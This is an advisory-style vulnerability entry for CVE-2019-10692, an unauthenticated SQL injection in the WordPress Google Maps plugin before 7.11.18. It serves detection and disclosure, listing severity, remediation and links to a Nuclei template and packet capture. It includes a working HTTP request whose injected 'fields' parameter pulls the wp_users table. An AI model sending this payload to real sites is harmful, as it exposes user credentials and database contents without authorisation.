🔙 목록으로 돌아가기

CVE-2019-10692: WordPress Google Maps <7.11.18 - SQL Injection

TitleWordPress Google Maps <7.11.18 - SQL Injection
Authorpussycat0x
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
RemediationUpdate to the latest version of the WordPress Google Maps plugin (7.11.18 or higher).
CVSS Score9.8
EPSS Score0.89356
CVE IDCVE-2019-10692
CWE IDCWE-89
Tags cve2019 cve wp wp-plugin unauth sqli wordpress googlemaps wpscan codecabin vuln

🔍 Vulnerability Description

WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.13
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-10692.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-10692.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A